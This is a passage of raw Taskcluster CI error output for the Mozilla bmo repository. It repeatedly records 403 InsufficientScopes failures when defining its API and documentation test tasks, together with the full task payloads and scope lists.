{\\\"taskId\\\":\\\"ZvgyPQmRSl23CkqEVpuUJA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.182Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.183Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"P87ZtGjRRxufUD3r4XjvIw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.183Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.294Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"ZvgyPQmRSl23CkqEVpuUJA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.182Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.183Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"P87ZtGjRRxufUD3r4XjvIw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.183Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.294Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"ZvgyPQmRSl23CkqEVpuUJA\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"API\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"webservices\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"WebService API Tests\",\n                        \"description\": \"WebService API Tests\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-28T02:27:09.182Z\",\n                    \"deadline\": \"2016-09-29T02:27:09.183Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"P87ZtGjRRxufUD3r4XjvIw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T02:27:09.183Z\"\n                },\n                \"time\": \"2016-09-28T02:27:09.294Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"LUuf4YbZQnykQ9I7USeX5Q\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.182Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.182Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"P87ZtGjRRxufUD3r4XjvIw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.182Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.292Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"LUuf4YbZQnykQ9I7USeX5Q\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.182Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.182Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"P87ZtGjRRxufUD3r4XjvIw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.182Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.292Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    